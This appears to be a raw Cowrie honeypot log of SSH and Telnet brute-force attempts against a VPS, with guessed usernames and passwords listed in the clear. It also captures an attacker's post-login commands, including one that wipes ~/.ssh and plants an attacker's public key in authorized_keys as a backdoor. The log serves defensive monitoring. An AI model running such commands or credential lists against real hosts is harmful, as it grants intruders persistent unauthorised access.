{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.684709Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":50108,"dst_ip":"1.2.3.4","dst_port":22,"session":"52b7f911bee2","protocol":"ssh","message":"New connection: 45.150.34.92:50108 (1.2.3.4:22) [session: 52b7f911bee2]","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.700958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.701716Z","src_ip":"45.150.34.92","session":"52b7f911bee2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:53.957561Z","src_ip":"45.150.34.92","session":"52b7f911bee2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:57:54.011325Z","src_ip":"45.150.34.92","session":"52b7f911bee2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:55.031785Z","src_ip":"45.150.34.92","session":"52b7f911bee2"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":50112,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0ec0e8ab696","protocol":"ssh","message":"New connection: 45.150.34.92:50112 (1.2.3.4:22) [session: d0ec0e8ab696]","sensor":"my-vps","timestamp":"2025-09-08T23:57:55.048511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:57:55.049268Z","src_ip":"45.150.34.92","session":"d0ec0e8ab696"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:57:55.528823Z","src_ip":"45.150.34.92","session":"d0ec0e8ab696"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:57:55.583212Z","src_ip":"45.150.34.92","session":"d0ec0e8ab696"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:55.602562Z","src_ip":"45.150.34.92","session":"4953a9f42751"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:57:55.603526Z","src_ip":"45.150.34.92","session":"d0ec0e8ab696"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":53178,"dst_ip":"1.2.3.4","dst_port":22,"session":"513638498422","protocol":"ssh","message":"New connection: 93.113.63.124:53178 (1.2.3.4:22) [session: 513638498422]","sensor":"my-vps","timestamp":"2025-09-08T23:58:12.404261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:58:12.405282Z","src_ip":"93.113.63.124","session":"513638498422"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:58:12.464626Z","src_ip":"93.113.63.124","session":"513638498422"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T23:58:12.761279Z","src_ip":"93.113.63.124","session":"513638498422"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:13.835992Z","src_ip":"93.113.63.124","session":"513638498422"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":60788,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e7c1156aed7","protocol":"ssh","message":"New connection: 46.101.8.63:60788 (1.2.3.4:22) [session: 4e7c1156aed7]","sensor":"my-vps","timestamp":"2025-09-08T23:58:39.999410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:58:40.000296Z","src_ip":"46.101.8.63","session":"4e7c1156aed7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:58:40.021340Z","src_ip":"46.101.8.63","session":"4e7c1156aed7"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"changeme","message":"login attempt [ftpuser/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T23:58:40.145355Z","src_ip":"46.101.8.63","session":"4e7c1156aed7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:41.168500Z","src_ip":"46.101.8.63","session":"4e7c1156aed7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52486,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9243593f0c8","protocol":"ssh","message":"New connection: 217.72.205.35:52486 (1.2.3.4:22) [session: b9243593f0c8]","sensor":"my-vps","timestamp":"2025-09-08T23:58:43.173334Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:43.174616Z","src_ip":"217.72.205.35","session":"b9243593f0c8"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":58604,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd113b9cad3a","protocol":"ssh","message":"New connection: 182.18.161.165:58604 (1.2.3.4:22) [session: cd113b9cad3a]","sensor":"my-vps","timestamp":"2025-09-08T23:58:47.239489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:58:47.240468Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:58:47.490088Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.login.success","username":"root","password":"Root123123","message":"login attempt [root/Root123123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:58:48.527604Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:58:49.084543Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:58:49.085303Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:58:49.086351Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:49.337417Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:58:49.854053Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:58:49.854782Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:58:50.106342Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:50.107316Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":54628,"dst_ip":"1.2.3.4","dst_port":22,"session":"09c0da593231","protocol":"ssh","message":"New connection: 182.18.161.165:54628 (1.2.3.4:22) [session: 09c0da593231]","sensor":"my-vps","timestamp":"2025-09-08T23:58:50.358997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:58:50.359958Z","src_ip":"182.18.161.165","session":"09c0da593231"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:58:50.613582Z","src_ip":"182.18.161.165","session":"09c0da593231"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:58:51.669830Z","src_ip":"182.18.161.165","session":"09c0da593231"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:52.925686Z","src_ip":"182.18.161.165","session":"09c0da593231"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":54638,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ac46a2da048","protocol":"ssh","message":"New connection: 182.18.161.165:54638 (1.2.3.4:22) [session: 4ac46a2da048]","sensor":"my-vps","timestamp":"2025-09-08T23:58:53.176670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:58:53.177539Z","src_ip":"182.18.161.165","session":"4ac46a2da048"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:58:53.427861Z","src_ip":"182.18.161.165","session":"4ac46a2da048"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:58:54.471936Z","src_ip":"182.18.161.165","session":"4ac46a2da048"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:54.722466Z","src_ip":"182.18.161.165","session":"cd113b9cad3a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:58:54.723521Z","src_ip":"182.18.161.165","session":"4ac46a2da048"}
{"eventid":"cowrie.session.connect","src_ip":"139.101.141.223","src_port":40747,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d7b63f6fdee","protocol":"telnet","message":"New connection: 139.101.141.223:40747 (1.2.3.4:23) [session: 7d7b63f6fdee]","sensor":"my-vps","timestamp":"2025-09-08T23:59:09.411975Z"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.12","src_port":53706,"dst_ip":"1.2.3.4","dst_port":22,"session":"f614185dcfbc","protocol":"ssh","message":"New connection: 176.65.148.12:53706 (1.2.3.4:22) [session: f614185dcfbc]","sensor":"my-vps","timestamp":"2025-09-08T23:59:09.506111Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":55042,"dst_ip":"1.2.3.4","dst_port":22,"session":"55a3b1a20b2a","protocol":"ssh","message":"New connection: 45.150.34.92:55042 (1.2.3.4:22) [session: 55a3b1a20b2a]","sensor":"my-vps","timestamp":"2025-09-08T23:59:13.337643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:59:13.338540Z","src_ip":"45.150.34.92","session":"55a3b1a20b2a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:13.411924Z","src_ip":"176.65.148.12","session":"f614185dcfbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:59:13.593457Z","src_ip":"45.150.34.92","session":"55a3b1a20b2a"}
{"eventid":"cowrie.login.failed","username":"super","password":"super","message":"login attempt [super/super] failed","sensor":"my-vps","timestamp":"2025-09-08T23:59:13.647636Z","src_ip":"45.150.34.92","session":"55a3b1a20b2a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:59:14.667264Z","src_ip":"45.150.34.92","session":"55a3b1a20b2a"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":40352,"dst_ip":"1.2.3.4","dst_port":22,"session":"627cf6593638","protocol":"ssh","message":"New connection: 93.113.63.124:40352 (1.2.3.4:22) [session: 627cf6593638]","sensor":"my-vps","timestamp":"2025-09-08T23:59:18.480449Z"}
